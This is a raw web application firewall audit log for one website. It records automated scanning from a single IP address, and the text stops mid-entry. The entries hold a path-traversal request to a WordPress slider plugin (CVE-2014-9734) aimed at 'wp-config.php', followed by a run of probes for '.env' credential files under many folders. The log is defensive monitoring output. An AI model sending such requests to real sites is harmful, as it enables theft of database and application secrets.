aFCbqlJfblPUQiSn5r2HUgAAAAA 198.55.98.236 54130 127.0.0.1 7081 --9321f84c-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --9321f84c-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.3.22 Pragma: no-cache Cache-Control: no-cache, must-revalidate, private, max-age=0 Expires: Sat, 26 Jul 1997 05:00:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 --9321f84c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:img. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:img: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. String match "/wp-admin/admin-ajax.php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/27_Apps_WPPlugin.conf"] [line "3239"] [id "222050"] [rev "8"] [msg "COMODO WAF: Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress (CVE-2014-9734)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbqlJfblPUQiSn5r2HUgAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:img. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.dealsdray.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:img: ../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbqlJfblPUQiSn5r2HUgAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match "/wp-admin/admin-ajax.php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/27_Apps_WPPlugin.conf"] [line "3239"] [id "222050"] [rev "8"] [msg "COMODO WAF: Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress (CVE-2014-9734)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] [hostname "www.dealsdray.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aFCbqlJfblPUQiSn5r2HUgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113194739459 76813 (- - -) Stopwatch2: 1750113194739459 76813; combined=2717, p1=364, p2=2131, p3=86, p4=40, p5=96, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9321f84c-Z-- --1a33fd07-A-- [17/Jun/2025:04:03:19.566249 +0530] aFCbr1CTF37l_jAzt4oIiAAAAAU 198.55.98.236 54236 127.0.0.1 7081 --1a33fd07-B-- GET /blog/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --1a33fd07-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --1a33fd07-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/blog/.env"] [unique_id "aFCbr1CTF37l_jAzt4oIiAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113199128810 437510 (- - -) Stopwatch2: 1750113199128810 437510; combined=2049, p1=379, p2=1576, p3=0, p4=0, p5=93, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1a33fd07-Z-- --043b5836-A-- [17/Jun/2025:04:03:20.919372 +0530] aFCbsFJfblPUQiSn5r2HVAAAAAA 198.55.98.236 54400 127.0.0.1 7081 --043b5836-B-- GET /admin/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --043b5836-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --043b5836-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/admin/.env"] [unique_id "aFCbsFJfblPUQiSn5r2HVAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113200477409 442027 (- - -) Stopwatch2: 1750113200477409 442027; combined=1844, p1=382, p2=1377, p3=0, p4=0, p5=85, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --043b5836-Z-- --23679179-A-- [17/Jun/2025:04:03:22.257874 +0530] aFCbsYoVQnPDyHnl9oPJNQAAAAY 198.55.98.236 54470 127.0.0.1 7081 --23679179-B-- GET /laravel/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --23679179-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --23679179-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/laravel/.env"] [unique_id "aFCbsYoVQnPDyHnl9oPJNQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113201822594 435349 (- - -) Stopwatch2: 1750113201822594 435349; combined=1882, p1=354, p2=1433, p3=0, p4=0, p5=94, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --23679179-Z-- --6f1a0e6d-A-- [17/Jun/2025:04:03:23.643253 +0530] aFCbs5VkCcfT-Z8NQYy6kwAAAAc 198.55.98.236 54494 127.0.0.1 7081 --6f1a0e6d-B-- GET /services/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --6f1a0e6d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --6f1a0e6d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/services/.env"] [unique_id "aFCbs5VkCcfT-Z8NQYy6kwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113203184479 458849 (- - -) Stopwatch2: 1750113203184479 458849; combined=1651, p1=352, p2=1202, p3=0, p4=0, p5=97, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f1a0e6d-Z-- --58c5765f-A-- [17/Jun/2025:04:03:24.956964 +0530] aFCbtKC450Yw050Ymr0b9gAAAAk 198.55.98.236 54548 127.0.0.1 7081 --58c5765f-B-- GET /config/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --58c5765f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --58c5765f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/config/.env"] [unique_id "aFCbtKC450Yw050Ymr0b9gAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113204525632 431399 (- - -) Stopwatch2: 1750113204525632 431399; combined=1903, p1=397, p2=1395, p3=0, p4=0, p5=110, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --58c5765f-Z-- --e05cc272-A-- [17/Jun/2025:04:03:26.293550 +0530] aFCbtZVkCcfT-Z8NQYy6lAAAAAc 198.55.98.236 54572 127.0.0.1 7081 --e05cc272-B-- GET /service/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --e05cc272-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --e05cc272-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/service/.env"] [unique_id "aFCbtZVkCcfT-Z8NQYy6lAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113205850647 442967 (- - -) Stopwatch2: 1750113205850647 442967; combined=1841, p1=458, p2=1290, p3=0, p4=0, p5=92, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e05cc272-Z-- --ce146a67-A-- [17/Jun/2025:04:03:27.599228 +0530] aFCbt1JfblPUQiSn5r2HVgAAAAA 198.55.98.236 54594 127.0.0.1 7081 --ce146a67-B-- GET /test/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --ce146a67-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --ce146a67-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/test/.env"] [unique_id "aFCbt1JfblPUQiSn5r2HVgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113207175739 423553 (- - -) Stopwatch2: 1750113207175739 423553; combined=1773, p1=395, p2=1278, p3=0, p4=0, p5=99, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce146a67-Z-- --6edaf13c-A-- [17/Jun/2025:04:03:28.892258 +0530] aFCbuFCTF37l_jAzt4oIiwAAAAU 198.55.98.236 54632 127.0.0.1 7081 --6edaf13c-B-- GET /demo/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --6edaf13c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --6edaf13c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/demo/.env"] [unique_id "aFCbuFCTF37l_jAzt4oIiwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113208462495 429828 (- - -) Stopwatch2: 1750113208462495 429828; combined=1965, p1=357, p2=1503, p3=0, p4=0, p5=105, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6edaf13c-Z-- --213da346-A-- [17/Jun/2025:04:03:31.573706 +0530] aFCbu0cTB7P_sALtclAPMwAAAAI 198.55.98.236 39430 127.0.0.1 7081 --213da346-B-- GET /local/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --213da346-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --213da346-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/local/.env"] [unique_id "aFCbu0cTB7P_sALtclAPMwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113211145541 428229 (- - -) Stopwatch2: 1750113211145541 428229; combined=1829, p1=426, p2=1301, p3=0, p4=0, p5=101, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --213da346-Z-- --84e10b2a-A-- [17/Jun/2025:04:03:32.957258 +0530] aFCbvLp3uuKArZI2bI_syQAAAAg 198.55.98.236 39468 127.0.0.1 7081 --84e10b2a-B-- GET /system/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --84e10b2a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --84e10b2a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/system/.env"] [unique_id "aFCbvLp3uuKArZI2bI_syQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113212545202 412133 (- - -) Stopwatch2: 1750113212545202 412133; combined=2024, p1=415, p2=1498, p3=0, p4=0, p5=110, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --84e10b2a-Z-- --7cc7f814-A-- [17/Jun/2025:04:03:34.298452 +0530] aFCbvVJfblPUQiSn5r2HWAAAAAA 198.55.98.236 39476 127.0.0.1 7081 --7cc7f814-B-- GET /shop/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --7cc7f814-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --7cc7f814-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/shop/.env"] [unique_id "aFCbvVJfblPUQiSn5r2HWAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113213879514 419014 (- - -) Stopwatch2: 1750113213879514 419014; combined=1881, p1=364, p2=1419, p3=0, p4=0, p5=98, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7cc7f814-Z-- --2a1bab54-A-- [17/Jun/2025:04:03:35.607113 +0530] aFCbvwrsPejRtmHkrKLWVQAAAAE 198.55.98.236 39490 127.0.0.1 7081 --2a1bab54-B-- GET /blog1/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --2a1bab54-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --2a1bab54-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/blog1/.env"] [unique_id "aFCbvwrsPejRtmHkrKLWVQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113215172665 434513 (- - -) Stopwatch2: 1750113215172665 434513; combined=2180, p1=464, p2=1608, p3=0, p4=0, p5=108, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2a1bab54-Z-- --e9628b0a-A-- [17/Jun/2025:04:03:36.902551 +0530] aFCbwFCTF37l_jAzt4oIjQAAAAU 198.55.98.236 39514 127.0.0.1 7081 --e9628b0a-B-- GET /site/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --e9628b0a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --e9628b0a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at 